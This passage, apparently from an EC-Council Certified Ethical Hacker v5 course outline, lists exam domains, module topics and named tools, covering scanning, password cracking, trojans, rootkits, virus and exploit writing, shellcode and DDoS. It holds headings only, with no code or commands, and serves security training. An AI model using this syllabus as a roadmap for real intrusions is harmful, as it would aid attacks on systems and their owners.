o Abyss Web Server for windows
o GFI LANguard Portable Storage Control
o Windows Security Officer - wso
File Share Scanning Tools
o Infiltrator Network Security Scanner
o Encrypted FTP 3
Password Directories
o Passphrase Keeper 2.60
o IISProtect
Password Guessing Tools
o Webmaster Password Generator
o Internet Explorer Password Recovery Master
o Password Recovery Toolbox
Link Checking Tools
o Alert Link Runner
o Link Utility
o LinxExplorer
Web Testing-based Scripting Tools
o Svoi.NET PHP Edit
o OptiPerl
o Blueprint Software Web Scripting Editor
Buffer Overflow Protection Tools
o StackGuard
o FormatGuard
o RaceGuard
File Encryption Tools
o Maxcrypt
o Secure IT
o Steganos
Database Assessment Tools
o EMS MySQL Manager
o SQL Server Compare
o SQL Stripes
Keyboard Logging and Screen Reordering Tools
o Spector Professional 5.0
o Handy Keylogger
o Snapshot Spy
System Event Logging and Reviewing Tools
o LT Auditor Version 8.0
o ZVisual RACF
o Network Intelligence Engine LS Series
Tripwire and Checksum Tools
o SecurityExpressions
o MD5
o Tripwire for Servers
Mobile-Code Scanning Tools
o Vital Security
o E Trust Secure Content Manager 1.1
o Internet Explorer Zones
Centralized Security Monitoring Tools
o ASAP eSMART™ Software Usage by ASAP Software
o WatchGuard VPN Manager
o Harvester
Web Log Analysis Tools
o AWStats
o Azure Web Log
o Summary
Forensic Data and Collection Tools
o Encase tool
o SafeBack
o ILook Investigator
Security Assessment Tools
o Nessus Windows Technology
o NetIQ Security Manager
o STAT Scanner
Multiple OS Management Tools
o Multiple Boot Manager
o Acronis OS Selector
o Eon
Phases of Penetration Testing
o Pre-Attack Phase
o Attack Phase
o Post-Attack Phase
Penetration Testing Deliverables Templates
SELF-STUDY MODULES
Covert Hacking
Insider attacks
What is covert channel?
Security Breach
Why Do You Want to Use Covert Channel?
Motivation of a Firewall Bypass
Covert Channels Scope
Covert Channel: Attack Techniques
Simple Covert Attacks
Advanced Covert Attacks
Reverse Connecting Agents
Covert Channel Attack Tools
o Netcat
o DNS tunnel
o DNS Tunneling
• Covert Channel Using DNS Tunneling
• DNS Tunnel Client
• DNS Tunneling Countermeasures
o SSH reverse tunnel
• Covert Channel Using SSH
• Covert Channel using SSH (Advanced)
o HTTP/S Tunneling Attack
o Covert Channel Hacking Tool: Active Port Forwarder
o Covert Channel Hacking Tool: CCTT
o Covert Channel Hacking Tool: Firepass
o Covert Channel Hacking Tool: MsnShell
o Covert Channel Hacking Tool: Web Shell
o Covert Channel Hacking Tool: NCovert
o Covert Channel Hacking via Spam E-mail Messages
o Hydan
o Covert Channel Hacking Tool: NCOVERT
Writing Virus Codes
Introduction of Virus
Types of Viruses
Symptoms of a Virus Attack
Prerequisites for Writing Viruses
Required Tools and Utilities
Virus Infection Flow Chart
o Step – I Finding file to infect
• Directory Traversal Method
• “dot dot” Method
o Step – II Check viruses infection criteria
o Step – III Check for previous infection
• Marking a File for Infection
o Step – IV Infect the file
o Step – V Covering tracks
o
Components of Viruses
Functioning of Replicator part
Diagrammatical representation
Writing Replicator
Writing Concealer
Dispatcher
Writing Bomb/Payload
Trigger Mechanism
Brute Force Logic Bombs
Testing Virus Codes
Tips for Better Virus Writing
Assembly Language Tutorial
Number System
Base 10 System
Base 2 System
Decimal 0 to 15 in Binary
Binary Addition (C stands for Canary)
Hexadecimal Number
Hex Example
Hex Conversion
nibble
Computer memory
Characters Coding
ASCII and UNICODE
CPU
Machine Language
Compilers
Clock Cycle
Original Registers
Instruction Pointer
Pentium Processor
Interrupts
Interrupt handler
External interrupts and Internal interrupts
Handlers
Machine Language
Assembly Language
Assembler
Assembly Language Vs High-level Language
Assembly Language Compilers
Instruction operands
MOV instruction
ADD instruction
SUB instruction
INC and DEC instructions
Directive
preprocessor
equ directive
%define directive
Data directives
Labels
Input and output
C Interface
Call
Creating a Program
Why should anyone learn assembly at all?
o First.asm
Assembling the code
Compiling the C code
Linking the object files
Understanding an assembly listing file
Big and Little Endian Representation
Skeleton File
Working with Integers
Signed integers
Signed Magnitude
Two’s Compliment
If statements
Do while loops
Indirect addressing
Subprogram
The Stack
The SS segment
ESP
The Stack Usage
The CALL and RET Instructions
General subprogram form
Local variables on the stack
General subprogram form with local variables
Multi-module program
Saving registers
Labels of functions
Calculating addresses of local variables
Exploit Writing
Exploits Overview
Prerequisites for Writing Exploits and Shellcodes
Purpose of Exploit Writing
Types of Exploits
o Stack Overflow
o Heap Corruption
o Format String
o Integer Bug Exploits
o Race Condition
o TCP/IP Attack
The Proof-of-Concept and Commercial Grade Exploit
Converting a Proof of Concept Exploit to Commercial Grade Exploit
Attack Methodologies
Socket Binding Exploits
Tools for Exploit Writing
o LibExploit
o Metasploit
o CANVAS
Steps for Writing an Exploit
Differences Between Windows and Linux Exploits
Shellcodes
o NULL Byte
o Types of Shellcodes
Tools Used for Shellcode Development
o NASM
o GDB
o objdump
o ktrace
o strace
o readelf
Steps for Writing a Shellcode
Issues Involved With Shellcode Writing
o Addressing problem
o Null byte problem
o System call implementation
Smashing the Stack for Fun and Profit
What is a Buffer?
Static Vs Dynamic Variables
Stack Buffers
Data Region
Memory Process Regions
What Is A Stack?
Why Do We Use A Stack?
The Stack Region
Stack frame
Stack pointer
Procedure Call (Procedure Prolog)
Compiling the code to assembly
Call Statement
Return Address (RET)
Word Size
Stack
Buffer Overflows
Error
Why do we get a segmentation violation?
Segmentation Error
Instruction Jump
Guess Key Parameters
Calculation
Shell Code
o The code to spawn a shell in C
Lets try to understand what is going on here. We'll start by studying main:
execve()
o execve() system call
exit.c
o List of steps with exit call
The code in Assembly
JMP
Code using indexed addressing
Offset calculation
shellcodeasm.c
testsc.c
Compile the code
NULL byte
shellcodeasm2.c
testsc2.c
Writing an Exploit
overflow1.c
Compiling the code
sp.c
vulnerable.c
NOPs
o Using NOPs
o Estimating the Location
Windows Based Buffer Overflow Exploit Writing
Buffer Overflow
Stack overflow
Writing Windows Based Exploits
Exploiting stack based buffer overflow
OpenDataSource Buffer Overflow Vulnerability Details
Simple Proof of Concept
Windbg.exe
Analysis
EIP Register
o Location of EIP
o EIP
Execution Flow
But where can we jump to?
Offset Address
The Query
Finding jmp esp
Debug.exe
listdlls.exe
Msvcrt.dll
Out.sql
The payload
ESP
Limited Space
Getting Windows API/function absolute address
Memory Address
Other Addresses
Compile the program
Final Code
Reverse Engineering
Positive Applications of Reverse Engineering
Ethical Reverse Engineering
World War Case Study
DMCA Act
What is Disassembler?
Why do you need to decompile?
Professional Disassembler Tools
Tool: IDA Pro
Convert Machine Code to Assembly Code
Decompilers
Program Obfuscation
Convert Assembly Code to C++ code
Machine Decompilers
Tool: dcc
Machine Code of compute.exe Prorgam
Assembly Code of compute.exe Program
Code Produced by the dcc Decompiler in C
Tool: Boomerang
What Boomerang Can Do?
Andromeda Decompiler
Tool: REC Decompiler
Tool: EXE To C Decompiler
Delphi Decompilers
Tools for Decompiling .NET Applications
Salamander .NET Decompiler
Tool: LSW DotNet-Reflection-Browser
Tool: Reflector
Tool: Spices NET.Decompiler
Tool: Decompilers.NET
.NET Obfuscator and .NET Obfuscation
Java Bytecode Decompilers
Tool: JODE Java Decompiler
Tool: JREVERSEPRO
Tool: SourceAgain
Tool: ClassCracker
Python Decompilers
Reverse Engineering Tutorial
OllyDbg Debugger
How Does OllyDbg Work?
Debugging a Simple Console Application
• The exam codes EC0-350 are 312-50 are the same exam.
• The exam title "Certified Ethical Hacker" and "Ethical Hacking and Countermeasures" are the same
• VUE and Prometric systems use different exam codes.
• The CEHv4 exam has been retired since June 1st 2007
• CEHv5 exam is available on Prometric Prime, APTC and VUE.
• Exams at VUE and Prometric APTC requires Eligibility Code.
• Please visit :
• http://www.eccouncil.org/takeexam.htm for details
•
• Credit Towards Certification
Certified Ethical Hacker
Master of Security Science (MSS)
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Ethics and Legality
Ethics and Legality
Understand Ethical Hacking terminology
Define the Job role of an ethical hacker
Understand the different phases involved in ethical hacking
Identify different types of hacking technologies
List the 5 stages of ethical hacking?
What is hacktivism?
List different types of hacker classes
Define the skills required to become an ethical hacker
What is vulnerability research?
Describe the ways in conducting ethical hacking
Understand the Legal implications of hacking
Understand 18 U.S.C. § 1030 US Federal Law
Footprinting
Define the term Footprinting
Describe information gathering methodology
Describe competitive intelligence
Understand DNS enumeration
Understand Whois, ARIN lookup
Identify different types of DNS records
Understand how traceroute is used in Footprinting
Understand how e-mail tracking works
Understand how web spiders work
Scanning
Define the term port scanning, network scanning and vulnerability scanning
Understand the CEH scanning methodology
Understand Ping Sweep techniques
Understand nmap command switches
Understand SYN, Stealth, XMAS, NULL, IDLE and FIN scans
List TCP communication flag types
Understand War dialing techniques
Understand banner grabbing and OF fingerprinting techniques
Understand how proxy servers are used in launching an attack
How does anonymizers work
Understand HTTP tunneling techniques
Understand IP spoofing techniques
Enumeration
What is Enumeration?
What is meant by null sessions
What is SNMP enumeration?
What are the steps involved in performing enumeration?
System hacking
Understanding password cracking techniques
Understanding different types of passwords
Identifying various password cracking tools
Understand Escalating privileges
Understanding keyloggers and other spyware technologies
Understand how to Hide files
Understanding rootkits
Understand Steganography technologies
Understand how to covering your tracks and erase evidences
Trojans and Backdoors
What is a Trojan?
What is meant by overt and covert channels?
List the different types of Trojans
What are the indications of a Trojan attack?
Understand how “Netcat” Trojan works
What is meant by “wrapping”
How does reverse connecting Trojans work?
What are the countermeasure techniques in preventing Trojans?
Understand Trojan evading techniques
Sniffers
Understand the protocol susceptible to sniffing
Understand active and passive sniffing
Understand ARP poisoning
Understand ethereal capture and display filters
Understand MAC flooding
Understand DNS spoofing techniques
Describe sniffing countermeasures
Denial of Service
Understand the types of DoS Attacks
Understand how DDoS attack works
Understand how BOTs/BOTNETS work
What is “smurf” attack
What is “SYN” flooding
Describe the DoS/DDoS countermeasures
Social Engineering
What is Social Engineering?
What are the Common Types of Attacks
Understand Dumpster Diving
Understand Reverse Social Engineering
Understand Insider attacks
Understand Identity Theft
Describe Phishing Attacks
Understand Online Scams
Understand URL obfuscation
Social Engineering countermeasures
Session Hijacking
Understand Spoofing vs. Hijacking
List the types of Session Hijacking
Understand Sequence Prediction
What are the steps in performing session hijacking
Describe how you would prevent session hijacking
Hacking Web Servers
List the types of web server vulnerabilities
Understand the attacks Against Web Servers
Understand IIS Unicode exploits
Understand patch management techniques
Understand Web Application Scanner
What is Metasploit Framework?
Describe Web Server hardening methods
Web Application Vulnerabilities
Understanding how web application works
Objectives of web application hacking
Anatomy of an attack
Web application threats
Understand Google hacking
Understand Web Application Countermeasures
Web Based Password Cracking Techniques
List the Authentication types
What is a Password Cracker?
How does a Password Cracker work?
Understand Password Attacks - Classification
Understand Password Cracking Countermeasures
SQL Injection
What is SQL injection?
Understand the Steps to conduct SQL injection
Understand SQL Server vulnerabilities
Describe SQL Injection countermeasures
Wireless Hacking
Overview of WEP, WPA authentication systems and cracking techniques
Overview of wireless Sniffers and SSID, MAC Spoofing
Understand Rogue Access Points
Understand Wireless hacking techniques
Describe the methods in securing wireless networks
Virus and Worms
Understand the difference between an virus and a Worm
Understand the types of Viruses
How a virus spreads and infects the system
Understand antivirus evasion techniques
Understand Virus detection methods
Physical Security
Physical security breach incidents
Understanding physical security
What is the need for physical security?
Who is accountable for physical security?
Factors affecting physical security
Linux Hacking
Understand how to compile a Linux Kernel
Understand GCC compilation commands
Understand how to install LKM modules
Understand Linux hardening methods
Evading IDS, Honeypots and Firewalls
List the types of Intrusion Detection Systems and evasion techniques
List firewall and honeypot evasion techniques
Buffer Overflows
Overview of stack based buffer overflows
Identify the different types of buffer overflows and methods of detection
Overview of buffer overflow mutation techniques
Cryptography
Overview of cryptography and encryption techniques
Describe how public and private keys are generated
Overview of MD5, SHA, RC4, RC5, Blowfish algorithms
Penetration Testing Methodologies
Overview of penetration testing methodologies
List the penetration testing steps
Overview of the Pen-Test legal framework
Overview of the Pen-Test deliverables
List the automated penetration testing tools
Course Outline Version 5
Module 1: Introduction to Ethical Hacking
Why Security?
Essential Terminologies
Elements of Security
The Security, Functionality, and Ease of Use Triangle
What Does a Malicious Hacker Do?
o Reconnaissance
o Scanning
o Gaining access
o Maintaining access
o Covering Tracks
Types of Hacker Attacks
o Operating System attacks
o Application-level attacks
o Shrink Wrap code attacks
o Misconfiguration attacks
Hacktivism
Hacker Classes
Hacker Classes and Ethical Hacking
What Do Ethical Hackers Do?
Can Hacking be Ethical?
How to Become an Ethical Hacker?
Skill Profile of an Ethical Hacker
What is Vulnerability Research?
Why Hackers Need Vulnerability Research?
Vulnerability Research Tools
Vulnerability Research Websites
How to Conduct Ethical Hacking?
Approaches to Ethical Hacking
Ethical Hacking Testing
Ethical Hacking Deliverables
Computer Crimes and Implications
Legal Perspective
o U.S. Federal Law
o Japan’s Cyber Laws
o United Kingdom’s Cyber Laws
o Australia’s Cyber Laws
o Germany’s Cyber Laws
o Singapore’s Cyber Laws
Module 2: Footprinting
Revisiting Reconnaissance
Defining of Footprinting
Information Gathering Methodology
Unearthing Initial Information
Finding a Company’s URL
Internal URL
Extracting Archive 0f a Website
Google Search for Company’s Info.
People Search
Footprinting Through Job Sites
Passive Information Gathering
Competitive Intelligence Gathering
Why Do You Need Competitive Intelligence?
Companies Providing Competitive Intelligence Services
Competitive Intelligence
o When Did This Company Begin?
o How Did It Develop?
o What Are This Company's Plans?
o What Does Expert Opinion Say About The Company?
o Who Are The Leading Competitors?
Public and Private Websites
Tools
o DNS Enumerator
o SpiderFoot
o Sensepost Footprint Tools
• BiLE.pl
• BiLE-weigh.pl
• tld-expand.pl
• vet-IPrange.pl
• qtrace.pl
• vet-mx.pl
• jarf-rev
• jarf-dnsbrute
o Wikito Footprinting Tool
o Web Data Extractor Tool
o Whois
o Nslookup
o Necrosoft
o ARIN
o Traceroute
o Neo Trace
o GEOSpider
o Geowhere
o GoogleEarth
o VisualRoute Trace
o Kartoo Search Engine
o Touchgraph Visual Browser
o SmartWhois
o VisualRoute Mail Tracker
o eMailTrackerPro
o Read Notify
o HTTrack Web Site Copier
o Web Ripper
o robots.txt
o Website watcher
o E-mail Spider
o Power E-mail Collector Tool
Steps to Perform Footprinting
Module 3: Scanning
Definition of Scanning
Types of Scanning
o Port Scanning
o Network Scanning
o Vulnerability Scanning
Objectives of Scanning
CEH Scanning Methodology
o Check for live systems
• ICMP Scanning
• Angry IP
• HPING2
• Ping Sweep
• Firewalk
o Check for open ports
• Nmap
• TCP Communication Flags
• Three Way Handshake
• SYN Stealth / Half Open Scan
• Stealth Scan
• Xmas Scan
• FIN Scan
• NULL Scan
• IDLE Scan
• ICMP Echo Scanning/List Scan
• TCP Connect / Full Open Scan
• FTP Bounce Scan
• FTP Bounce Attack
• SYN/FIN Scanning Using IP Fragments
• UDP Scanning
• Reverse Ident Scanning
• RPC Scan
• Window Scan
• Blaster Scan
• PortScan Plus, Strobe
• IPSecScan
• NetScan Tools Pro
• WUPS – UDP Scanner
• SuperScan
• IPScanner
• MegaPing
• Global Network Inventory Scanner
• Net Tools Suite Pack
• FloppyScan
• War Dialer Technique
• Why War Dialing?
• Wardialing
• PhoneSweep
• THC Scan
• SandTrap Tool
o Banner grabbing/OS Fingerprinting
• OS Fingerprinting
• Active Stack Fingerprinting
• Passive Fingerprinting
• Active Banner Grabbing Using Telnet
• GET REQUESTS
• p0f – Banner Grabbing Tool
• p0f for Windows
• Httprint Banner Grabbing Tool
• Active Stack Fingerprinting
• XPROBE2
• RING V2
• Netcraft
• Disabling or Changing Banner
• Apache Server
• IIS Server
• IIS Lockdown Tool
• ServerMask
• Hiding File Extensions
• PageXchanger 2.0
o Identify Service
o Scan for Vulnerability
• Bidiblah Automated Scanner
• Qualys Web-based Scanner
• SAINT
• ISS Security Scanner
• Nessus
• GFI LANGuard
• SATAN (Security Administrator’s Tool for Analyzing Networks)
• Retina
• NIKTO
• SAFEsuite Internet Scanner
• IdentTCPScan
o Draw network diagrams of Vulnerable hosts
• Cheops
• FriendlyPinger
o Prepare proxies
• Proxy Servers
• Use of Proxies for Attack
• SocksChain
• Proxy Workbench
• ProxyManager Tool
• Super Proxy Helper Tool
• Happy Browser Tool (Proxy-based)
• MultiProxy
• TOR Proxy Chaining Software
o Anonymizers
• Primedius Anonymizer
• Browzar
• Torpark Browser
• G-Zapper - Google Cookies
o SSL Proxy Tool
o HTTP Tunneling Techniques
o HTTPort
o Spoofing IP Address - Source Routing
o Detecting IP Spoofing
o Despoof Tool
o Scanning Countermeasures
o Tool: SentryPC
Module 4: Enumeration
Overview of System Hacking Cycle
What is Enumeration?
Techniques for Enumeration
Netbios Null Sessions
Tool
o DumpSec
o NetBIOS Enumeration Using Netview
o Nbtstat
o SuperScan4
o Enum
o sid2user
o user2sid
o GetAcct
Null Session Countermeasures
PSTools
o PsExec
o PsFile
o PsGetSid
o PsKill
o PsInfo
o PsList
o PsLoggedOn
o PsLogList
o PsPasswd
o PsService
o PsShutdown
o PsSuspend
o PsUptime
SNMP Enumeration
Management Information Base
Tools
o SNMPutil
o Solarwinds
o SNScan V1.05
o Getif SNMP MIB Browser
UNIX Enumeration
SNMP UNIX Enumeration
SNMP Enumeration Countermeasures
Tools
o Winfingerprint
o Windows Active Directory Attack Tool
o IP Tools Scanner
o Enumerate Systems Using Default Passwords
Steps to Perform Enumeration
Module 5: System Hacking
Cracking Passwords
o Password Types
o Types of Password Attacks
o Passive Online – Wire Sniffing
o Passive Online Attacks
o Active Online – Password Guessing
o Offline Attacks
• Dictionary Attack
• Hybrid Attack
• Brute-force Attack
• Pre-computed Hashes
o Non-Technical Attacks
o Password Mitigation
o Permanent Account Lockout – Employee Privilege Abuse
o Administrator Password Guessing
o Manual Password Cracking Algorithm
o Automatic Password Cracking Algorithm
o Performing Automated Password Guessing
o Tools
• NAT
• Smbbf (SMB Passive Brute Force Tool)
• SmbCrack Tool
• Legion
• LOphtcrack
o Microsoft Authentication - LM, NTLMv1, and NTLMv2
o Kerberos Authentication
o What is LAN Manager Hash?
o Salting
o Tools
• PWdump2 and Pwdump3
• Rainbowcrack
• KerbCrack
• NBTDeputy
• NetBIOS DoS Attack
• John the Ripper
o Password Sniffing
o How to Sniff SMB Credentials?
o Sniffing Hashes Using LophtCrack
o Tools
• ScoopLM
• SMB Replay Attacks
• Replay Attack Tool: SMBProxy
• Hacking Tool: SMB Grind
• Hacking Tool: SMBDie
o SMBRelay Weaknesses & Countermeasures
o Password Cracking Countermeasures
o LM Hash Backward Compatibility
o How to Disable LM HASH?
o Tools
• Password Brute-Force Estimate Tool
• Syskey Utility
Escalating Privileges
o Privilege Escalation
o Cracking NT/2000 Passwords
o Active@ Password Changer
o Change Recovery Console Password
o Privilege Escalation Tool: x.exe
Executing applications
o Tool:
• Psexec
• Remoexec
• Alchemy Remote Executor
• Keystroke Loggers
• E-mail Keylogger
• Spytector FTP Keylogger
• IKS Software Keylogger
• Ghost Keylogger
• Hardware Keylogger
• Keyboard Keylogger: KeyGhost Security Keyboard
• USB Keylogger:KeyGhost USB Keylogger
o What is Spyware?
o Tools
• Spyware: Spector
• Remote Spy
• eBlaster
• Stealth Voice Recorder
• Stealth Keylogger
• Stealth Website Logger
• Digi-Watcher Video Surveillance
• Desktop Spy Screen Capture Program
• Telephone Spy
• Print Monitor Spy Tool
• Perfect Keylogger
• Stealth Email Redirector
• Spy Software: Wiretap Professional
• Spy Software: FlexiSpy
• PC PhoneHome
o Keylogger Countermeasures
o Anti-Keylogger
o PrivacyKeyboard
Hiding Files
o Hacking Tool: RootKit
o Why Rootkits?
o Rootkits in Linux
o Detecting Rootkits
o Rootkit Detection Tools
• BlackLight from F-Secure Corp
• RootkitRevealer from Sysinternals
• Malicious Software Removal Tool from Microsoft Corp
o Sony Rootkit Case Study
o Planting the NT/2000 Rootkit
o Rootkits
• Fu
• AFX Rootkit 2005
• Nuclear
• Vanquish
o Rootkit Countermeasures
o Patchfinder2.0
o RootkitRevealer
o Creating Alternate Data Streams
o How to Create NTFS Streams?
o NTFS Stream Manipulation
o NTFS Streams Countermeasures
o NTFS Stream Detectors
• ADS Spy
• ADS Tools
o What is Steganography?
o Tools
• Merge Streams
• Invisible Folders
• Invisible Secrets 4
• Image Hide
• Stealth Files
• Steganography
• Masker Steganography Tool
• Hermetic Stego
• DCPP – Hide an Operating System
• Camera/Shy
• Mp3Stego
• Snow.exe
o Video Steganography
o Steganography Detection
o SIDS ( Stego intrusion detection system )
o High-Level View
o Tool : dskprobe.exe
Covering tracks
o Disabling Auditing
o Clearing the Event Log
o Tools
• elsave.exe
• Winzapper
• Evidence Eliminator
• Traceless
• Tracks Eraser Pro
• ZeroTracks
Module 6: Trojans and Backdoors
Introduction
Effect on Business
What is a Trojan?
Overt and Covert Channels
Working of Trojans
Different Types of Trojans
What Do Trojan Creators Look For?
Different Ways a Trojan Can Get into a System
Indications of a Trojan Attack
Ports Used by Trojans
How to Determine which Ports are “Listening”?
Classic Trojans Found in the Wild
Trojans
o Tini
o iCmd
o NetBus
o Netcat
o Beast
o MoSucker
o Proxy Server
o SARS Trojan Notification
Wrappers
Wrapper Covert Program
Wrapping Tools
o One file EXE Maker
o Yet Another Binder
o Pretator Wrapper
Packaging Tool: WordPad
RemoteByMail
Tool: Icon Plus
Defacing Application: Restorator
HTTP Trojans
Trojan Attack through Http
HTTP Trojan (HTTP RAT)
Shttpd Trojan - HTTP Server
Reverse Connecting Trojans
Nuclear RAT Trojan (Reverse Connecting)
Tool: BadLuck Destructive Trojan
ICMP Tunneling
ScreenSaver Password Hack Tool – Dummylock
Trojan
o Phatbot
o Amitis
o Senna Spy
o QAZ
o Back Orifice
o Back Oriffice 2000
o SubSeven
o CyberSpy Telnet Trojan
o Subroot Telnet Trojan
o Let Me Rule! 2.0 BETA 9
o Donald Dick
o RECUB
Hacking Tool: Loki
Atelier Web Remote Commander
Trojan Horse Construction Kit
How to Detect Trojans?
Tools
o Netstat
o fPort
o TCPView
o CurrPorts
o Process Viewer
o What’s on My Computer
o Super System Helper
Delete Suspicious Device Drivers
Inzider - Tracks Processes and Ports
Tools
o What's Running?
o MSConfig
o Registry-What’s Running
o Autoruns
o Hijack This (System Checker)
o Startup List
Anti-Trojan Software
Evading Anti-Virus Techniques
Evading Anti-Trojan/Anti-Virus Using Stealth Tools v2.0
Backdoor Countermeasures
Tools
o Tripwire
o System File Verification
o MD5sum.exe
o Microsoft Windows Defender
How to Avoid a Trojan Infection?
Module 7: Sniffers
Definition of Sniffing
Protocols Vulnerable to Sniffing
o Tool: Network View – Scans the Network for Devices
o The Dude Sniffer
o Ethereal
o tcpdump
Types of Sniffing
o Passive Sniffing
o Active sniffing
ARP - What is Address Resolution Protocol?
ARP Spoofing Attack
o How Does ARP Spoofing Work?
o ARP Poisoning
o Mac Duplicating Attack
Tools for ARP Spoofing
o Arpspoof (Linux-based tool)
o Ettercap (Linux and Windows)
MAC Flooding
Tools for MAC Flooding
o Macof (Linux-based tool)
o Etherflood (Linux and Windows)
Threats of ARP Poisoning
IRS – ARP Attack Tool
ARPWorks Tool
Tool: Nemesis
Sniffer Hacking Tools (dsniff package)
o Arpspoof
o Dnsspoof
o Dsniff
o Filesnarf
o Mailsnarf
o Msgsnarf
o Tcpkill
o Tcpnice
o Urlsnarf
o Webspy
o Webmitm
DNS Poisoning Techniques
Types of DNS Poisoning:
o Intranet DNS Spoofing (Local network)
o Internet DNS Spoofing (Remote network)
o Proxy Server DNS Poisoning
o DNS Cache Poisoning
Interactive TCP Relay
Sniffers
o HTTP Sniffer: EffeTech
o Ace Password Sniffer
o MSN Sniffer
o SmartSniff
o Session Capture Sniffer: NetWitness
o Session Capture Sniffer: NWreader
o Cain and Abel
o Packet Crafter Craft Custom TCP/IP Packets
o SMAC
o NetSetMan Tool
o Raw Sniffing Tools
o Sniffit
o Aldebaran
o Hunt
o NGSSniff
o Ntop
o Pf
o IPTraf
o EtherApe
o Netfilter
o Network Probe
o Maa Tec Network Analyzer
Tools
o Snort
o Windump
o Etherpeek
o Mac Changer
o Iris
o NetIntercept
o WinDNSSpoof
How to Detect Sniffing?
AntiSniff Tool
ArpWatch Tool
Countermeasures
Module 8: Denial of Service
What are Denial of Service Attacks?
Goal of DoS
Impact and the Modes of Attack
Types of Attacks
o DoS attack
o DDos attack
DoS Attack Classification
o Smurf
o Buffer Overflow Attack
o Ping of death
o Teardrop
o SYN Attack
DoS Attack Tools
o Jolt2
o Bubonic.c
o Land and LaTierra
o Targa
o Blast20
o Nemesy
o Panther2
o Crazy Pinger
o Some Trouble
o UDP Flood
o FSMax
Botnets
Uses of botnets
Types of Bots
o Agobot/Phatbot/Forbot/XtremBot
o SDBot/RBot/UrBot/UrXBot
o mIRC-based Bots - GT-Bots
Tool: Nuclear Bot
What is DDoS Attack?
Characteristics of DDoS Attacks
DDOS Unstoppable
Agent Handler Model
DDoS IRC based Model
DDoS Attack Taxonomy
Amplification Attack
Reflective DNS Attacks
Reflective DNS Attacks Tool: ihateperl.pl
DDoS Tools
o Trin00
o Tribe Flood Network (TFN)
o TFN2K
o Stacheldraht
o Shaft
o Trinity
o Knight
o Mstream
o Kaiten
Worms
Slammer Worm
Spread of Slammer Worm – 30 min
MyDoom.B
SCO Against MyDoom Worm
How to Conduct a DDoS Attack
The Reflected DoS Attacks
Reflection of the Exploit
Countermeasures for Reflected DoS
DDoS Countermeasures
Taxonomy of DDoS Countermeasures
Preventing Secondary Victims
Detect and Neutralize Handlers
Detect Potential Attacks
Mitigate or Stop the Effects of DDoS Attacks
Deflect Attacks
Post-attack Forensics
Packet Traceback
Module 9: Social Engineering
What is Social Engineering?
Human Weakness
“Rebecca” and “Jessica”
Office Workers
Types of Social Engineering
o Human-based
o Computer-based
Preventing Insider Threat
Common Targets of Social Engineering
Factors that make Companies Vulnerable to Attacks
Why is Social Engineering Effective?
Warning Signs of an Attack
Tool : Netcraft Anti-Phishing Toolbar
Phases in a Social Engineering Attack
Behaviors Vulnerable to Attacks
Impact on the Organization
Countermeasures
Policies and Procedures
Security Policies - Checklist
Phishing Attacks and Identity Theft
What is Phishing?
Phishing Report
Attacks
Hidden Frames
URL Obfuscation
URL Encoding Techniques
IP Address to Base 10 Formula
Karen’s URL Discombobulator
HTML Image Mapping Techniques
Fake Browser Address Bars
Fake Toolbars
Fake Status Bar
DNS Cache Poisoning Attack
Module 10: Session Hijacking
What is Session Hijacking?
Spoofing vs. Hijacking
Steps in Session Hijacking
Types of Session Hijacking
o Active
o Passive
The 3-Way Handshake
TCP Concepts 3-Way Handshake
Sequence Number Prediction
TCP/IP Hijacking
RST Hijacking
RST Hijacking Tool: hijack_rst.sh
Programs that Perform Session Hijacking
Hacking Tools
o Juggernaut
o Hunt
o TTY Watcher
o IP Watcher
o T-Sight
o Paros HTTP Session
Remote TCP Session Reset Utility
Dangers Posed by Hijacking
Protecting against Session Hijacking
Countermeasure: IP Security
IP-SEC
Module 11: Hacking Web Servers
How Web Servers Work
How are Web Servers Compromised?
How are Web Servers Defaced?
Apache Vulnerability
Attacks Against IIS
o IIS Components
o IIS Directory Traversal (Unicode) Attack
Unicode
o Unicode Directory Traversal Vulnerability
Hacking Tool: IISxploit.exe
Msw3prt IPP Vulnerability
WebDAV / ntdll.dll Vulnerability
RPC DCOM Vulnerability
ASN Exploits
ASP Trojan (cmd.asp)
IIS Logs
Network Tool: Log Analyzer
Hacking Tool: CleanIISLog
Unspecified Executable Path Vulnerability
Metasploit Framework
Immunity CANVAS Professional
Core Impact
Hotfixes and Patches
What is Patch Management?
Solution: UpdateExpert
Patch Management Tool
o Qfecheck
o HFNetChk
cacls.exe Utility
Vulnerability Scanners
Online Vulnerability Search Engine
Network Tools
o Whisker
o N-Stealth HTTP Vulnerability Scanner
Hacking Tool: WebInspect
Network Tool: Shadow Security Scanner
SecureIIS
Countermeasures
File System Traversal Countermeasures
Increasing Web Server Security
Web Server Protection Checklist
Module 12: Web Application Vulnerabilities
Web Application Setup
Web Application Hacking
Anatomy of an Attack
Web Application Threats
Cross-Site Scripting/XSS Flaws
o Countermeasures
SQL Injection
Command Injection Flaws
o Countermeasures
Cookie/Session Poisoning
o Countermeasures
Parameter/Form Tampering
Buffer Overflow
o Countermeasures
Directory Traversal/Forceful Browsing
o Countermeasures
Cryptographic Interception
Cookie Snooping
Authentication Hijacking
o Countermeasures
Log Tampering
Error Message Interception
Attack Obfuscation
Platform Exploits
DMZ Protocol Attacks
o Countermeasures
Security Management Exploits
Web Services Attacks
Zero-Day Attacks
Network Access Attacks
TCP Fragmentation
Hacking Tools
o Instant Source
o Wget
o WebSleuth
o BlackWidow
o WindowBomb
o Burp
o cURL
o dotDefender
o Google Hacking
o Acunetix Web Scanner
o AppScan – Web Application Scanner
o AccessDiver
Module 13: Web-based Password Cracking Techniques
Definition of Authentication
Authentication Mechanisms
